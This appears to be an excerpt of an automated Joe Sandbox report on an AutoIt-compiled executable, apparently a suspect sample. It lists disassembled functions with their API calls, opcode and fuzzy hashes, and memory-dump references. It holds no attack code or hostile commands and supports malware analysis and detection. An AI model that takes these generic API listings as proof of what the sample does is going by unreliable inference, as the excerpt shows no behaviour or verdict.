                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: 5bf875d57670121dc94ead27af462fd49aeb17f51eac5a5ef16c817e0bfe0d91
                                                                                                                        • Instruction ID: 83f97311f043dab9693a9481cb2f7db03685335a43d1bb927dcb035dbaa810df
                                                                                                                        • Opcode Fuzzy Hash: 5bf875d57670121dc94ead27af462fd49aeb17f51eac5a5ef16c817e0bfe0d91
                                                                                                                        • Instruction Fuzzy Hash: 24E046B5545204EFDB005F71EC486693FE9EB4C3A0F11940AFD5AAB250DBB9D9848F80
                                                                                                                        Function 00E74C3D Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __getptd_noexit.LIBCMT ref: 00E74C3E
                                                                                                                          • Part of subcall function 00E786B5: GetLastError.KERNEL32(?,00E70127,00E788A3,00E74673,?,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E786B7
                                                                                                                          • Part of subcall function 00E786B5: __calloc_crt.LIBCMT ref: 00E786D8
                                                                                                                          • Part of subcall function 00E786B5: GetCurrentThreadId.KERNEL32 ref: 00E78701
                                                                                                                          • Part of subcall function 00E786B5: SetLastError.KERNEL32(00000000,00E70127,00E788A3,00E74673,?,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E78719
                                                                                                                        • CloseHandle.KERNEL32(?,?,00E74C1D), ref: 00E74C52
                                                                                                                        • __freeptd.LIBCMT ref: 00E74C59
                                                                                                                        • ExitThread.KERNEL32 ref: 00E74C61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 408300095-0
                                                                                                                        • Opcode ID: 0b5e82fdf8cc31192f03359431af0f4cb204980e00c166f78d61d7fa7d7b2e40
                                                                                                                        • Instruction ID: fc8a7e116d5ec726681638f5f180d07cb79eb52b184df0a4d4be0505b41a6045
                                                                                                                        • Opcode Fuzzy Hash: 0b5e82fdf8cc31192f03359431af0f4cb204980e00c166f78d61d7fa7d7b2e40
                                                                                                                        • Instruction Fuzzy Hash: 17D0A731443A515FD13327649F0D60DB790DF01B29B11D305E03D750E08F208C055691
                                                                                                                        Function 00ED2350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: >$DEFINE
                                                                                                                        • API String ID: 4104443479-1664449232
                                                                                                                        • Opcode ID: cbbc5654d479e0c4e2305031ea26e1e834d42579d7c9c5765f05523ae2abebdf
                                                                                                                        • Instruction ID: 90752d769d140f4fcb09f2c956fc8852ac7e595b245aa294bd9bc83fa938269e
                                                                                                                        • Opcode Fuzzy Hash: cbbc5654d479e0c4e2305031ea26e1e834d42579d7c9c5765f05523ae2abebdf
                                                                                                                        • Instruction Fuzzy Hash: 88127B75A0020ADFCF24CF58C480AADB7B1FF58314F25959AE955BB391E730AD86CB90
                                                                                                                        Function 00E8EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00E8ECA0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContainedObject
                                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                                        • API String ID: 3565006973-3941886329
                                                                                                                        • Opcode ID: 0834f68ec93fd8cebc2f7c130c7849b0d346628af681d118d13efd0a91b838f0
                                                                                                                        • Instruction ID: 9b742f31b01b6b16436888ca14177fee8dc636f9a38d38b5cf67e0c67b77b9b6
                                                                                                                        • Opcode Fuzzy Hash: 0834f68ec93fd8cebc2f7c130c7849b0d346628af681d118d13efd0a91b838f0
                                                                                                                        • Instruction Fuzzy Hash: 42913774600701EFDB14EF64C884B6ABBE5BF48714B24956EE94EEB391DB70E841CB60
                                                                                                                        Function 00E9E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E53BCF: _wcscpy.LIBCMT ref: 00E53BF2
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00E9E785
                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E9E84E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                        • String ID: LPT
                                                                                                                        • API String ID: 3222508074-1350329615
                                                                                                                        • Opcode ID: 99eaee13472ac031e76ffd2c1d0828cce41d7c45cc7ab92a83afb2cc96321a32
                                                                                                                        • Instruction ID: 475ef1fab642e0cf712b76f3a828b95608b07949a16fa418d0c53bb1d68e9d21
                                                                                                                        • Opcode Fuzzy Hash: 99eaee13472ac031e76ffd2c1d0828cce41d7c45cc7ab92a83afb2cc96321a32
                                                                                                                        • Instruction Fuzzy Hash: 50616075A00215AFCF18DB94C895EAEB7F9EF08310F04546AFA56BB391DB30AE44CB51
                                                                                                                        Function 00E51B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00E51B83
                                                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00E51B9C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                        • Opcode ID: 6811991842fa2ab788c1cad173f9d96d6f6d9e292fd4af8716daa8be53a0a498
                                                                                                                        • Instruction ID: 9045f990a808184a82f92ee1c8a82ada6ac9e12f8d7f6147a13ad4da96217183
                                                                                                                        • Opcode Fuzzy Hash: 6811991842fa2ab788c1cad173f9d96d6f6d9e292fd4af8716daa8be53a0a498
                                                                                                                        • Instruction Fuzzy Hash: B4515B71448B45ABE720AF14E885BABBBECFF98394F41484DF2C8511A1EB71856CC763
                                                                                                                        Function 00E9CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5417D: __fread_nolock.LIBCMT ref: 00E5419B
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9CF49
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9CF5C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                                                        • String ID: FILE
                                                                                                                        • API String ID: 4029003684-3121273764
                                                                                                                        • Opcode ID: ffad01477f5f1920aacb6c293849c0a54c2144a7cc6ecec55afb133389ef8815
                                                                                                                        • Instruction ID: 8544ff3776c30897ef5020f0cef33c0a5282d83b0201df31225d9e6e31613ffc
                                                                                                                        • Opcode Fuzzy Hash: ffad01477f5f1920aacb6c293849c0a54c2144a7cc6ecec55afb133389ef8815
                                                                                                                        • Instruction Fuzzy Hash: EA41E572A00219BADF20EBA4CC41FEF7BFA9F49714F101469F601BB191D7719A888750
                                                                                                                        Function 00E79AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        • __getbuf.LIBCMT ref: 00E79B8A
                                                                                                                        • __lseeki64.LIBCMT ref: 00E79BFA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                        • String ID: pM
                                                                                                                        • API String ID: 3311320906-582843881
                                                                                                                        • Opcode ID: b222d39a1ff74071be33f3eaaf2fcf98d93521906e8eeaa2dae9cf2a21e26575
                                                                                                                        • Instruction ID: b8c01acf2236565ba618edf82c6a57773e64d43cf27b7b32039a4ebd855a8f7c
                                                                                                                        • Opcode Fuzzy Hash: b222d39a1ff74071be33f3eaaf2fcf98d93521906e8eeaa2dae9cf2a21e26575
                                                                                                                        • Instruction Fuzzy Hash: 28414271500B059ED7359F28D891ABAB7E8EF81334F04D61DE4BEA72D2E774E8408B11
                                                                                                                        Function 00EBA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00EBA668
                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EBA67D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: '
                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                        • Opcode ID: 5bcca5abf0a96892e1a530059888188dc6d76d39579e22d50c32b5f8da580917
                                                                                                                        • Instruction ID: 81d2178468f7b6fb4df69c5caa0f8ae1ea758e6d8d2d6c67bc4d27444dc3818b
                                                                                                                        • Opcode Fuzzy Hash: 5bcca5abf0a96892e1a530059888188dc6d76d39579e22d50c32b5f8da580917
                                                                                                                        • Instruction Fuzzy Hash: 9A4116B5A012099FDF14CF68C880BDA7BB5FB08304F18507AE905EB385D770A945CFA1
                                                                                                                        Function 00EB9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00EB961B
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EB9657
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                        • Opcode ID: 00301302790c8ce11a8208c4f59bf3352c1b631af22f11980e05b345bcfe623e
                                                                                                                        • Instruction ID: 4e8ff4cfc5fe8f192b5ad353580d2fc231ddb490b6cfb2281d3d975b6d4d45b6
                                                                                                                        • Opcode Fuzzy Hash: 00301302790c8ce11a8208c4f59bf3352c1b631af22f11980e05b345bcfe623e
                                                                                                                        • Instruction Fuzzy Hash: F031C131100204AEEB109F34DC40FFB77A8FF48764F00A519F9A9E7191CA319C81D760
                                                                                                                        Function 00E95B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E95BE4
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E95C1F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                        • Opcode ID: 22a1471fc536f5e81cf443a8d922f4fe072bbc436ea72b9dc8ff4445b0996e45
                                                                                                                        • Instruction ID: 29b41bd3d996b55573667d6f4b0b3628dbee95c7d52f66b0100675899148624d
                                                                                                                        • Opcode Fuzzy Hash: 22a1471fc536f5e81cf443a8d922f4fe072bbc436ea72b9dc8ff4445b0996e45
                                                                                                                        • Instruction Fuzzy Hash: 0F319333600709EBDF268F99D885BAEFBF4EF05358F185019E985B61A0E7709A45DB10
                                                                                                                        Function 00EA6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __snwprintf.LIBCMT ref: 00EA6BDD
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __snwprintf_memmove
                                                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                        • API String ID: 3506404897-2584243854
                                                                                                                        • Opcode ID: e0475916aa1f1443483c765c74b623db9e8e5582fa1eab6f85b36f4c76fe35c0
                                                                                                                        • Instruction ID: 7744b6916e0dc12b37fc898954d7a0c1dbc1d9a8d7a951ea736909f46a76349e
                                                                                                                        • Opcode Fuzzy Hash: e0475916aa1f1443483c765c74b623db9e8e5582fa1eab6f85b36f4c76fe35c0
                                                                                                                        • Instruction Fuzzy Hash: 9121AE71600218AECF11EFA4CC82AEDB7F9EB8A700F145855F805BB182DA70EA45DB61
                                                                                                                        Function 00EB91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EB9269
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EB9274
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: Combobox
                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                        • Opcode ID: 4846f53555c1204aed83a8ef841016299c7a32708f9dd6b59c4dd3312b6d6620
                                                                                                                        • Instruction ID: 4788b1d336ce2dd1f0f94ee6753c8e35163df0d36f8e107c869d1b341f1d2334
                                                                                                                        • Opcode Fuzzy Hash: 4846f53555c1204aed83a8ef841016299c7a32708f9dd6b59c4dd3312b6d6620
                                                                                                                        • Instruction Fuzzy Hash: F511C871700109BFEF11DF54EC80EFB379AEB883A8F115125FA18A72A1D635DC5197A0
                                                                                                                        Function 00EB970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E6C657
                                                                                                                          • Part of subcall function 00E6C619: GetStockObject.GDI32(00000011), ref: 00E6C66B
                                                                                                                          • Part of subcall function 00E6C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E6C675
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00EB9775
                                                                                                                        • GetSysColor.USER32(00000012), ref: 00EB978F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                        • Opcode ID: f1f8740ea94d3ba2cdf72dd772200e69811ca838ceb9a78216ab37c28289ffa6
                                                                                                                        • Instruction ID: 1568cc869949fbc5d7db8379cd67aca2d59e9af95f33ab1347f7b086b6cc4d76
                                                                                                                        • Opcode Fuzzy Hash: f1f8740ea94d3ba2cdf72dd772200e69811ca838ceb9a78216ab37c28289ffa6
                                                                                                                        • Instruction Fuzzy Hash: 3E115972520219AFDB04DFB8DC45EEA7BE8FB08318F005529FA56E3241D634E851DB60
                                                                                                                        Function 00EB9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00EB94A6
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EB94B5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                        • String ID: edit
                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                        • Opcode ID: aa5a6ff56d7c7574beba5b8651e209a546089b18cedf0b8e13d68baa3e419f32
                                                                                                                        • Instruction ID: 82827fd488f42e563feee506a08f23627692364f5cc5728c5ec6fdbe41e760ca
                                                                                                                        • Opcode Fuzzy Hash: aa5a6ff56d7c7574beba5b8651e209a546089b18cedf0b8e13d68baa3e419f32
                                                                                                                        • Instruction Fuzzy Hash: FA118F71104208AFEB109EA4EC84EFB376AEB05378F105724FA75A71E1C775DC529BA0
                                                                                                                        Function 00E95C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E95CF3
                                                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E95D12
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
